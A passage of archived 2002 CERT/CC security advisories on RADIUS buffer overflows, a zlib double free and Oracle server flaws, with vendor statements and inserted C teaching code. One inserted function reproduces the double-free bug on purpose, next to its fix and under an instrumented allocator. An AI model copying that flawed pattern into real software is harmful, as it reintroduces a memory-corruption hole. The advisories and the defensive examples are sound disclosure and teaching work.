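        uint8_t alen = attrs[off + 1];          /* includes the 2 header bytes */
        if (alen < 2 || alen > len - off)
            return ATTRS_BAD_ATTR_LEN;
        if (type == RADIUS_ATTR_VENDOR_SPECIFIC) {
            if (alen < 6)                       /* header + Vendor-Id at minimum */
                return ATTRS_BAD_ATTR_LEN;
            size_t voff = off + 6;
            size_t vend = off + alen;
            while (voff < vend) {
                if (vend - voff < 2)
                    return ATTRS_TRUNCATED;
                uint8_t vlen = attrs[voff + 1];
                /* The check the affected servers omitted: vendor-length must be
                 * at least 2 and must not run past the enclosing attribute. */
                if (vlen < 2 || vlen > vend - voff)
                    return ATTRS_BAD_VENDOR_LEN;
                (*nvsa)++;
                voff += vlen;
            }
        }
        off += alen;
    }
    return ATTRS_OK;
}

/* VU#589523 side: the digest input is the received packet followed by the
 * shared secret. Refuse to build it when the two do not fit the fixed
 * buffer, instead of copying the secret past its end. Returns the number
 * of bytes written, or -1 when it would not fit. */
int build_digest_input(const uint8_t *pkt, size_t pkt_len, const char *secret,
                       uint8_t *out, size_t out_size)
{
    size_t slen = strlen(secret);
    if (pkt_len > out_size || slen > out_size - pkt_len)
        return -1;
    memcpy(out, pkt, pkt_len);
    memcpy(out + pkt_len, secret, slen);
    return (int)(pkt_len + slen);
}

/* Constructed sample attribute lists (not taken from any real capture);
 * Vendor-Id 1234 is a placeholder. */
const uint8_t good_attrs[] = {
    1, 7, 'a', 'l', 'i', 'c', 'e',               /* User-Name = "alice" */
    26, 11, 0, 0, 0x04, 0xd2,                    /* VSA, Vendor-Id 1234 */
    1, 5, 'a', 'b', 'c'                          /* vendor-type 1, vendor-length 5 */
};
const uint8_t bad_attrs[] = {
    26, 9, 0, 0, 0x04, 0xd2,                     /* VSA, Vendor-Id 1234 */
    1, 1, 'x'                                    /* vendor-length 1: malformed */
};

int main(void)
{
    int n = 0;
    printf("good: rc=%d sub-attributes=%d\n",
           validate_radius_attrs(good_attrs, sizeof good_attrs, &n), n);
    printf("bad:  rc=%d (naive data length would be %d)\n",
           validate_radius_attrs(bad_attrs, sizeof bad_attrs, &n),
           naive_vendor_data_len(1));
    return 0;
}
```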
Systems Affected by VU#936683

   * Cistron RADIUS versions 1.6.5 and prior
   * FreeRADIUS versions 0.3 and prior
   * ICRADIUS versions 0.18.1 and prior
   * Livingston RADIUS versions 2.1 and earlier
   * YARD RADIUS 1.0.19 and prior
   * XTRADIUS 1.1-pre1 and prior

II. Impact

Both vulnerabilities allow an attacker to cause a denial of service of the RADIUS server. On some systems, VU#589523 may allow the execution of code if the attacker has knowledge of the shared secret.

III. Solution

Apply a patch, or upgrade to the version specified by your vendor.

Block packets to the RADIUS server at the firewall

Limit access to the RADIUS server to those addresses which are approved to authenticate to the RADIUS server. Note that this does not protect your server from attacks originating from these addresses.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Apple

Mac OS X and Mac OS X Server -- Not vulnerable since RADIUS is not shipped with those products.

Cisco

Cisco Systems has reviewed the following products that implement RADIUS with regards to this vulnerability, and has determined that the following are NOT vulnerable to this issue: Cisco IOS, Cisco Catalyst OS, Cisco Secure PIX firewall, Cisco Secure Access Control System for Windows, Cisco Aironet, Cisco Access Registrar, and Cisco Resource Pooling Management Service. At this time, we are not aware of any Cisco products that are vulnerable to the issues discussed in this report.

Cistron

You state 2 vulnerabilities:

   1. Digest Calculation Buffer Overflow Vulnerability
      Cistron Radius up to and including 1.6.4 is vulnerable
   2. Invalid attribute length calculation on malformed Vendor-Specific attr.
      Cistron Radius up to and including 1.6.5 is vulnerable

Today I have released version 1.6.6, which also fixes (2). The homepage is http://www.radius.cistron.nl/ on which you can also find the ChangeLog. An announcement to the cistron-radius mailing list was also made today. So everybody should upgrade to 1.6.6.

FreeBSD

FreeBSD versions prior to 4.5-RELEASE (which is shipping today or tomorrow or so) do contain some of the RADIUS packages mentioned below: radiusd-cistron, freeradius, ascend-radius, icradius, and radiusclient. However, 4.5-RELEASE will not ship with any of these RADIUS packages, except radiusclient. Also, note that the information you [CERT/CC] have forwarded previously indicates that neither Merit RADIUS (radius-basic) nor radiusclient are vulnerable.

Fujitsu

Fujitsu's UXP/V operating system is not vulnerable because UXP/V does not support the Radius functionality.

GnuRADIUS

The bug was fixed in version 0.96.

Hewlett-Packard

We have tested our Version of RADIUS, and we are NOT vulnerable.

IBM

IBM's AIX operating system, all versions, is not vulnerable as we do not ship the RADIUS project with AIX.

Juniper Networks

Juniper products have been tested and are not affected by this vulnerability.

Lucent Technologies, Inc.

   Lucent and Ascend "Free" RADIUS server Product Status
   Reiteration of product End of Life
   February 14, 2002

The purpose of this announcement is to make official the end of life of products based on the Livingston Enterprises RADIUS server, and to reiterate the terms of the original license.

Prior to the Lucent Technologies acquisition of Ascend Communications and Livingston Enterprises, both companies distributed RADIUS servers at no cost to their customers. The initial Livingston server was RADIUS 1.16 followed in June 1999 by RADIUS 2.1. The Ascend server was based on the Livingston 1.16 product with the most recent version being released in June 1998.
Lucent Technologies no longer distributes these products, does not provide any support services for these products, and has not done so for some time. All of these products were distributed as-is without warranty, under the BSD "Open Source" license with the following terms:

   This software is provided by the copyright holders and contributors ``as is'' and any express or implied warranties, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose are disclaimed. In no event shall the copyright holder or contributors be liable for any direct, indirect, incidental, special, exemplary, or consequential damages (including, but not limited to, procurement of substitute goods or services; loss of use, data, or profits; or business interruption) however caused and on any theory of liability, whether in contract, strict liability, or tort (including negligence or otherwise) arising in any way out of the use of this software, even if advised of the possibility of such damage.

   Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

   * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
   * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
   * All advertising materials mentioning features or use of this software must display the following acknowledgement: This product includes software developed by Lucent Technologies and its contributors.
   * Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.

Under this license, other parties are free to develop and release other products and versions.
However, as noted in the license terms, Lucent Technologies can not and does not assume any responsibility for any releases, present or future, based on these products.

Replacement Product

The replacement product is NavisRadius 4.x. NavisRadius is a fully supported commercial product currently available from Lucent Technologies. Please visit the NavisRadius product web site at http://www.lucentradius.com for product information and free evaluation copies.

   Richard Perlman
   NavisRadius Product Management
   Network Operations Software
   perl@lucent.com
   +1 510-747-5650

Microsoft

We've completed our investigation into this issue based on the information provided and have determined that no version of Microsoft IAS is susceptible to either vulnerability.

NetBSD

Some of the affected radius daemons are available from NetBSD pkgsrc. It is highly advisable that you update to the latest versions available from pkgsrc. Also note that pkgsrc/security/audit-packages can be used to notify you when new pkgsrc related security issues are announced.

Process Software

MultiNet and TCPware do not provide a RADIUS implementation.

RADIUS (previously known as Lucent RADIUS)

I wish to advise that Lucent Radius 2.1 is vulnerable to VU#589523, but is not vulnerable to VU#936683. I have made an unofficial patch to this code to resolve this problem. It will be released in ftp://ftp.vergenet.net/pub/radius/ where previous patches to Radius by myself are available.

RADIUSClient

I've just uploaded version 0.3.2 of the radiusclient library to ftp://ftp.cityline.net/pub/radiusclient/radiusclient-0.3.2.tar.gz which contains a fix for the reported buffer overflow.

Red Hat

We do not ship any radius software as part of any of our main operating systems. However, Cistron RADIUS was part of our PowerTools add-on software CD from versions 5.2 through 7.1. Thus while not installed by default, some users of Red Hat Linux may be using Cistron RADIUSD.
Errata packages that fix this problem and our advisory will be available shortly on our web site at the URL below. At the same time users of the Red Hat Network will be able to update their systems to patched versions using the up2date tool.

http://www.redhat.com/support/errata/RHSA-2002-030.html

SCO

The Caldera NON-Linux operating systems: OpenServer, UnixWare, and Open UNIX, do not ship Radius servers or clients.

SGI

SGI does not ship with a RADIUS server or client, so we are not vulnerable to these issues.

Wind River Systems

The current RADIUS client product from Wind River Systems, WindNet RADIUS 1.1, is not susceptible to VU#936683 and VU#589523 in our internal testing.

VU#936683 - WindNet RADIUS will pass the packet up to the application. The application may need to be aware of the invalid attribute length.

VU#589523 - WindNet RADIUS will drop the packet overflow.

Please contact Wind River support at support@windriver.com or call (800) 458-7767 with any test reports related to VU#936683 and VU#589523.

XTRADIUS

We are trying to release a new and fixed version of xtradius by the end of the month (version 1.2.1). Right now the new version is in CVS and we are testing it.

YARD RADIUS

The current version 1.0.19 of Yardradius (which is derived from Lucent 2.1) seems to suffer from both problems. I think I will release a new version (1.0.20) which solves those buffer overflows before your suggested date [3/4/2002].

_________________________________________________________________

Our thanks to 3APA3A <3APA3A@security.nnov.ru> and Joshua Hill for their cooperation, reporting and analysis of this vulnerability.

_________________________________________________________________

Feedback about this Advisory can be sent to the author, Jason A. Rafail.

_________________________________________________________________

Appendix B. - References

1. http://www.kb.cert.org/vuls/id/589523
2. http://www.kb.cert.org/vuls/id/936683
3. http://www.security.nnov.ru/advisories/radius.asp
4. http://www.untruth.org/~josh/security/radius
5. http://www.securityfocus.com/bid/3530

______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2002-06.html

______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address: CERT Coordination Center, Software Engineering Institute, Carnegie Mellon University, Pittsburgh PA 15213-3890 U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message:

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material.
Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

March 04, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPIPKVaCVPMXQI2HJAQFfUwQAq41ely7YkhdKYYM+YdjyGPpbMMqzi8Cb
7mEOX8HByLfVQL4e5wnrJOrIhRvX2jCvDMC6KCfPBR8VQ9DZz6hmj1XqUX6TH1EN
T+9SnRCSxuRs8NtkBEWAYrHletfQ02C3v6As85Lqxl7nbYmXt3QrF88T+WNpv3r7
AD7ZeRPeYdI=
=wtUX
-----END PGP SIGNATURE-----

Date: Tue, 12 Mar 2002 13:50:48 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-07 Double Free Bug in zlib Compression Library

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-07 Double Free Bug in zlib Compression Library

Original release date: March 12, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Any software that is linked to zlib 1.1.3 or earlier may be affected
* Data compression libraries derived from zlib 1.1.3 or earlier may contain a similar bug

Overview

There is a bug in the zlib compression library that may manifest itself as a vulnerability in programs that are linked with zlib. This may allow an attacker to conduct a denial-of-service attack, gather information, or execute arbitrary code. It is important to note that the CERT/CC has not received any reports of exploitation of this bug. Based on the information available to us at this time, it is difficult to determine whether this bug can be successfully exploited. However, given the widespread deployment of zlib, we have published this document as a proactive measure.

I. Description

There is a bug in the decompression algorithm used by the popular zlib compression library. If an attacker is able to pass a specially-crafted block of invalid compressed data to a program that includes zlib, the program's attempt to decompress the crafted data can cause the zlib routines to corrupt the internal data structures maintained by malloc. The bug results from a programming error that causes segments of dynamically allocated memory to be released more than once (i.e., "double-freed").
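The shape of the bug (an error path that releases a buffer but leaves the owning pointer in place, so a later cleanup releases the same buffer again) is easier to see in code than in prose. The following is an added example written for this page, not zlib's own source: build_tree, inflate_dynamic_buggy, inflate_dynamic_fixed and blocks_cleanup are stand-ins invented here for the huft_build() / inflate_trees_dynamic() / inflate_blocks() chain the advisory describes, the "crafted" input is a constructed placeholder with no relation to a real deflate stream, and tracked_free() is a small instrumented free() that only imitates the double-free detection the FreeBSD and OpenBSD statements in Appendix A attribute to their malloc implementations. Because the tracker swallows the second release instead of handing it to free(), the program runs without corrupting the heap while still counting the defect.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical return codes, named after zlib's for readability only. */
#define Z_OK        0
#define Z_MEM_ERROR (-4)

/* Instrumented free(): remembers every pointer it has released so that a
 * second release of the same pointer is reported instead of being passed to
 * the real allocator. This imitates what a double-free-detecting malloc does
 * natively; it is a teaching aid, not a production guard. */
#define TRACK_MAX 64
static uintptr_t freed_ptrs[TRACK_MAX];
static int       freed_count;
static int       double_free_count;

static void reset_tracking(void) {
    freed_count = 0;
    double_free_count = 0;
}

static void tracked_free(void *p) {
    if (p == NULL) return;                       /* free(NULL) is a no-op */
    for (int i = 0; i < freed_count; i++) {
        if (freed_ptrs[i] == (uintptr_t)p) {     /* released once already */
            double_free_count++;
            return;                              /* never call free() twice */
        }
    }
    if (freed_count < TRACK_MAX) freed_ptrs[freed_count++] = (uintptr_t)p;
    free(p);
}

/* Decoder state modelled on the advisory: a heap-allocated table owned by
 * the block decoder. */
struct blocks_state {
    unsigned *tree;
};

/* Stand-in for the tree builder. On the constructed "invalid" input (an
 * all-zero block) it allocates the table and then reports Z_MEM_ERROR,
 * leaving the caller holding a live allocation alongside an error code. */
static int build_tree(const unsigned char *in, size_t len, unsigned **out) {
    *out = malloc(256 * sizeof(unsigned));
    if (*out == NULL) return Z_MEM_ERROR;
    memset(*out, 0, 256 * sizeof(unsigned));
    for (size_t i = 0; i < len; i++) if (in[i] != 0) return Z_OK;
    return Z_MEM_ERROR;
}

/* Buggy pattern: the error path releases the table but leaves s->tree
 * pointing at freed memory, so the later cleanup releases it again. */
static int inflate_dynamic_buggy(struct blocks_state *s,
                                 const unsigned char *in, size_t len) {
    int r = build_tree(in, len, &s->tree);
    if (r != Z_OK) {
        tracked_free(s->tree);     /* first release */
        return r;                  /* dangling pointer left behind */
    }
    return Z_OK;
}

/* Fixed pattern: whoever frees also clears the owning pointer, so the
 * cleanup's free(NULL) is harmless. */
static int inflate_dynamic_fixed(struct blocks_state *s,
                                 const unsigned char *in, size_t len) {
    int r = build_tree(in, len, &s->tree);
    if (r != Z_OK) {
        tracked_free(s->tree);
        s->tree = NULL;            /* the one-line ownership fix */
        return r;
    }
    return Z_OK;
}

/* Stand-in for the block decoder's cleanup: unconditionally frees the table. */
static void blocks_cleanup(struct blocks_state *s) {
    tracked_free(s->tree);         /* second release in the buggy variant */
    s->tree = NULL;
}

/* Runs one variant on constructed invalid input and returns how many double
 * frees the tracker caught: 1 for the buggy path, 0 for the fixed path. */
static int run_variant(int fixed) {
    static const unsigned char crafted[8] = {0};   /* constructed placeholder */
    struct blocks_state s = { NULL };
    reset_tracking();
    if (fixed) inflate_dynamic_fixed(&s, crafted, sizeof crafted);
    else       inflate_dynamic_buggy(&s, crafted, sizeof crafted);
    blocks_cleanup(&s);
    return double_free_count;
}

int main(void) {
    printf("buggy path: %d double free(s) caught\n", run_variant(0));
    printf("fixed path: %d double free(s) caught\n", run_variant(1));
    return 0;
}
```

Build with any C99 compiler (for example `cc -std=c99 -Wall example.c`). The point of the fixed variant is the ownership rule, not the allocator: an allocator that aborts on a double free turns this bug into a crash (a denial of service) rather than heap corruption, which is a useful safety net but not a substitute for the upgrade to zlib 1.1.4 that the Solution section prescribes.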
Specifically, when inftrees.c:huft_build() encounters the crafted data, it returns an unexpected Z_MEM_ERROR to inftrees.c:inflate_trees_dynamic(). When a subsequent call is made to infblock.c:inflate_blocks(), the inflate_blocks function tries to free an internal data structure a second time.

Because this bug interferes with the proper allocation and deallocation of dynamic memory, it may be possible for an attacker to influence the operation of programs that include zlib. In most circumstances, this influence will be limited to denial of service or information leakage, but it is theoretically possible for an attacker to insert arbitrary code into a running program. This code would be executed with the permissions of the vulnerable program.

The CERT/CC is tracking this issue as VU#368819. This reference number corresponds to CVE candidate CAN-2002-0059.

II. Impact

This bug may introduce vulnerabilities into any program that includes the affected library. Depending upon how and where the zlib routines are called from the given program, the resulting vulnerability may have one or more of the following impacts: denial of service, information leakage, or execution of arbitrary code.

III. Solution

Upgrade your version of zlib

The maintainers of zlib have released version 1.1.4 to address this vulnerability. Upgrade any software that is linked to or derived from an earlier version of zlib. The latest version of zlib is available at http://www.zlib.org

These are the MD5 checksums for zlib version 1.1.4:

abc405d0bdd3ee22782d7aa20e440f08 zlib-1.1.4.tar.gz
9bf1d36ced334b0cf1f996f5c8171018 zlib114.zip

Apply a patch from your vendor

The zlib compression library is freely available and used by many vendors in a wide variety of applications. Any one of these applications may contain a vulnerability introduced by this bug. Appendix A contains information provided by vendors for this advisory.
As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Apple Computer, Inc.

Mac OS X and Mac OS X Server do not contain this vulnerability.

Compaq Computer Corporation

COMPAQ COMPUTER CORPORATION
-----------------------------
x-ref: SSRT0818 zlib

At the time of writing this document, Compaq continues to evaluate this potential problem and impacts to Compaq released software. Compaq will implement solutions based on the conclusion of this evaluation as necessary. Compaq will provide notice of any new patches resulting from any required solution through standard patch notification procedures; they will be available from your normal Compaq Services support channel.

COMPAQ COMPUTER CORPORATION
-----------------------------

Conectiva Linux

Conectiva Linux supported versions (5.0, 5.1, 6.0, 7.0, ferramentas graficas and ecomerce) are affected by the zlib vulnerability. Updates will be sent to our security mailing lists and be available at our ftp site and mirrors. The updates will include a new version of zlib itself and also other packages which include their own version of zlib or are linked statically to the system-wide copy of zlib.

Engarde

EnGarde Secure Linux Community and Professional are both vulnerable to the zlib bugs. Guardian Digital addressed this vulnerability in ESA-20020311-008 which may be found at: http://www.linuxsecurity.com/advisories/other_advisory-1960.html

EnGarde Secure Professional users may upgrade their systems using the Guardian Digital Secure Network.
FreeBSD

FreeBSD is not vulnerable, as the FreeBSD malloc implementation detects and complains about several programming errors including this kind of double free.

Fujitsu

Fujitsu's UXP/V operating system is not affected by the zlib vulnerability because it does not support zlib.

Hewlett-Packard Company

HP is not vulnerable.

IBM Corporation

IBM's AIX operating system, version 5.1, ships with open source-originated zlib that is used with the Redhat Package Manager (rpm) to install applications that are included in the AIX-Linux Affinity Toolkit. zlib (libz.a) is a shared library in AIX. AIX 5.1 is susceptible to the described vulnerability. AIX 4.3.x does not ship with zlib, but customers who install zlib and use it will be similarly vulnerable. IBM will make the patched version of zlib available as soon as it is made available to us.

OpenBSD

OpenBSD is not vulnerable as OpenBSD's malloc implementation detects double freeing of memory. The zlib shipped with OpenBSD has been fixed in OpenBSD-current in January 2002.

Openwall GNU/*/Linux

All versions of Openwall GNU/*/Linux (Owl) prior to the 2002/02/15 Owl-current snapshot are affected by the zlib double-free vulnerability. Owl-current after 2002/02/15 includes the proper fixes in its userland packages. In order to not place the users of other vendors' products at additional risk, we have agreed to delay documenting this as a security change and including the fixes in Owl 0.1-stable until there's a coordinated public announcement. While we don't normally support this kind of a policy (releasing a fix before there's an announcement), this time handling the vulnerability in this way was consistent with the state of things by the time the (already publicly known) bug was first realized to be a security vulnerability.

The zlib bug could affect the following Owl packages: gnupg, openssh, rpm, texinfo (not necessarily in a security sense).
Of these, OpenSSH could potentially allow for an active remote attack resulting in a root compromise. If only SSH protocol version 1 is allowed in the OpenSSH server this is reduced to a local attack, but reverse remote attack possibilities by a malicious server remain. Additionally, any third-party software that makes use of the provided zlib library could be affected.

Parts of the Linux 2.2 kernel included in Owl were also affected by the vulnerability. Fortunately, those parts (Deflate compression support for PPP and the experimental Deflate compression extension to IrDA) are normally not used by the Owl userland. The bug has been corrected starting with Linux 2.2.20-ow2 which has been made public and a part of both Owl-current and Owl 0.1-stable on 2002/03/03. This change, however, will only be documented in the publicly-available change logs on the coordinated public announcement date.

Red Hat, Inc.

Red Hat Linux ships with a zlib library that is vulnerable to this issue. Although most packages in Red Hat Linux use the shared zlib library we have identified a number of packages that either statically link to zlib or contain an internal version of the zlib code. Updates to zlib and these packages as well as our advisory note are available from the following URL. Users of the Red Hat Network can use the up2date tool to automatically upgrade their systems.

http://www.redhat.com/support/errata/RHSA-2002-026.html

Red Hat would like to thank CERT/CC for their help in coordinating this issue with other vendors.

SGI

SGI acknowledges the zlib vulnerabilities reported by CERT and is currently investigating. No further information is available at this time. For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems.
Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list on http://www.sgi.com/support/security/.

XFree86

XFree86 versions 4.0 through 4.2.0 include zlib version 1.0.8. XFree86 3.x includes zlib version 1.0.4. The zlib code included with XFree86 is only used on some platforms. This is determined by the setting of HasZlib in the imake config files in the xc/config/cf source directory. If HasZlib is set to YES in the platform's vendor.cf file(s), then the system-provided zlib is used instead of the XFree86-provided version. XFree86 uses the system-provided zlib by default only on the following platforms:

* FreeBSD 2.2 and later
* NetBSD 1.2.2 and later
* OpenBSD
* Darwin
* Debian Linux

The zlib code in XFree86 has been fixed in the CVS repository (trunk and the xf-4_2-branch branch) as of 14 February 2002. A source patch for XFree86 4.2.0 will be available from ftp://ftp.xfree86.org/pub/XFree86/4.2.0/fixes/.

The following XFree86 4.2.0 binary distributions provided by XFree86 include and use a vulnerable version of zlib:

* Linux-alpha-glibc22
* Linux-ix86-glibc22

When updated binaries are available, it'll be documented at http://www.xfree86.org/4.2.0/UPDATES.html.

To check if an installation of XFree86 includes zlib, see if the following file exists: /usr/X11R6/lib/libz.a

To check if an XFree86 X server is dynamically linked with zlib, look for a line containing 'libz' in the output of 'ldd /usr/X11R6/bin/XFree86'.

Various vendors repackage and distribute XFree86, and may use settings and configurations different from those described here.
zlib.org

All users of zlib versions 1.1.3 or earlier should obtain the latest version, 1.1.4 or later, from http://www.zlib.org, in order to avoid this vulnerability as well as other possible vulnerabilities in versions prior to 1.1.3 when decompressing invalid data.

Appendix B. - References

* http://bugzilla.gnome.org/show_bug.cgi?id=70594
* http://www.kb.cert.org/vuls/id/368819
* http://www.libpng.org/pub/png/pngapps.html
* http://www.redhat.com/support/errata/RHSA-2002-026.html

_________________________________________________________________

The CERT/CC thanks Owen Taylor and Mark Cox of Red Hat, Inc. for reporting this vulnerability. We also thank Mark Adler of zlib.org for contributing to our research and Matthias Clasen for contributing to the discovery of this vulnerability.

_________________________________________________________________

This document was written by Jeffrey P. Lanza.

______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-2002-07.html
Copyright 2002 Carnegie Mellon University.
Revision History

Mar 12, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPI5JsqCVPMXQI2HJAQFAvAP/f380BKQqJmAVsjL/482b86Mw8RL5k+Ov
+ww1YfccKHTJdDlsqpIgX8LV59OII4KL31lAYrMrT2wJopY7wn7OSUvX7Z2aOLYE
0XQyjm5rT2mP9IKybBsHkXwHlTWZOi9iGnd9zSDndBgEaBifolcOh87z4zkE+noS
OzDiRjPbg7s=
=zhZM
-----END PGP SIGNATURE-----

Date: Thu, 14 Mar 2002 13:51:09 -0500 (EST)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-08 Multiple vulnerabilities in Oracle Servers

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-08 Multiple vulnerabilities in Oracle Servers

Original release date: March 14, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Systems running Oracle8i Database
* Systems running Oracle9i Database
* Systems running Oracle9i Application Server

Overview

Multiple vulnerabilities in Oracle Application Server have recently been discovered. These vulnerabilities include buffer overflows, insecure default settings, failures to enforce access controls, and failure to validate input. The impacts of these vulnerabilities include the execution of arbitrary commands or code, denial of service, and unauthorized access to sensitive information.

I. Description

Oracle Application Server includes a web server based on the Apache HTTP Server. Oracle extends the web server with a number of different components that can be used to provide interfaces to database applications. These components include, but are not limited to, a Procedural Language/Structured Query Language (PL/SQL) module, Java Server Pages, XSQL Servlets, and Simple Object Access Protocol (SOAP) applications.
The vulnerabilities referenced in this advisory were reported in several publications by David Litchfield of NGSSoftware:

* Hackproofing Oracle Application Server
  http://www.nextgenss.com/papers/hpoas.pdf
* NGSSoftware Insight Security Research Advisory #NISR20122001
  http://www.nextgenss.com/advisories/plsql.txt
* NGSSoftware Insight Security Research Advisory #NISR06022002A
  http://www.nextgenss.com/advisories/oraplsextproc.txt
* NGSSoftware Insight Security Research Advisory #NISR06022002B
  http://www.nextgenss.com/advisories/oraplsbos.txt
* NGSSoftware Insight Security Research Advisory #NISR06022002C
  http://www.nextgenss.com/advisories/orajsa.txt
  http://www.nextgenss.com/advisories/orajsp.txt

For the complete list of Oracle-related vulnerabilities published by the CERT/CC, please search the Vulnerability Notes Database using the term 'Oracle'. Details about specific vulnerabilities can be found in the appropriate vulnerability note.

Oracle has addressed these vulnerabilities with patches and recommended configuration changes. For more information please see the vendor information for Oracle in Appendix A.

Buffer overflows

Several buffer-overflow vulnerabilities exist in the way the PL/SQL module handles HTTP requests and configuration parameters. Default configuration settings in a range of components are insecure, and different components fail to apply access restrictions uniformly. These vulnerabilities expose both the systems running Oracle Application Server and the information held in the underlying databases to undue risk. Two more buffer overflow vulnerabilities exist in code that processes configuration parameters; these parameters can be specified via the PL/SQL gateway web administration interface. By default, access to the PL/SQL gateway web administration interface is not restricted [VU#611776].
VU#500203 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via help page request
VU#313280 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP Location header
VU#750299 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP request
VU#878603 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP Authorization header
VU#659043 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via Database Access Descriptor password
VU#923395 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via cache directory name

Insecure default configurations

The default installation of Oracle Application Server includes a number of insecure configuration settings, such as well-known default passwords and unrestricted access to applications and sensitive information.

VU#307835 - Oracle9i Application Server OWA_UTIL procedures expose sensitive information
VU#736923 - Oracle 9iAS SOAP components allow anonymous users to deploy applications by default
VU#611776 - Oracle9i Application Server PL/SQL Gateway web administration interface uses null authentication by default
VU#698467 - Oracle 9iAS default configuration allows access to "globals.jsa" file
VU#476619 - Oracle 9iAS default configuration allows arbitrary users to view sensitive configuration files
VU#712723 - Oracle 9iAS default configuration uses well-known default passwords
VU#168795 - Oracle 9iAS allows anonymous remote users to view sensitive Apache services by default
VU#278971 - Oracle 9i Application Server does not adequately handle requests for nonexistent JSP files thereby disclosing web folder path information

Failure to enforce access controls

Oracle Application Server does not uniformly enforce access restrictions. Different components do not adequately check authorization before granting access to protected resources.
VU#180147 - Oracle 9i Database Server PL/SQL module allows remote command execution without authentication
VU#193523 - Oracle 9i Application Server allows unauthenticated access to PL/SQL applications via alternate Database Access Descriptor
VU#977251 - Oracle 9iAS XSQL Servlet ignores file permissions allowing arbitrary users to view sensitive configuration files
VU#547459 - Oracle 9iAS creates temporary files when processing JSP requests that are world-readable

Failure to validate input

In one case, the PL/SQL module does not properly handle a malformed HTTP request.

VU#805915 - Oracle9i Application Server Apache PL/SQL module does not properly handle HTTP Authorization header

II. Impact

The impacts of these vulnerabilities include the remote execution of arbitrary code, remote execution of commands and SQL queries, disclosure of sensitive information, and denial of service.

Remote execution of arbitrary commands and code

This section contains vulnerabilities that permit a remote intruder to cause a denial of service or execute arbitrary commands, code, or queries on the system. Some of these vulnerabilities allow execution with the privileges of the Apache process. On UNIX systems, the Apache process typically runs as the "oracle" user. On Windows systems, the Apache service typically runs as the SYSTEM user; therefore, an attacker could gain complete control of the system by exploiting these vulnerabilities.
VU#500203 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via help page request
VU#313280 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via help page request Location: header
VU#750299 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP request
VU#878603 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP Authorization header password parameter
VU#659043 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via Database Access Descriptor password
VU#923395 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via cache directory name
VU#180147 - Oracle 9i Database Server PL/SQL module allows remote command execution without authentication
VU#736923 - Oracle 9iAS SOAP components allow anonymous users to deploy applications by default
VU#712723 - Oracle 9iAS default configuration uses well-known default passwords
VU#611776 - Oracle9i Application Server PL/SQL Gateway web administration interface uses null authentication by default

Unauthorized access to sensitive information

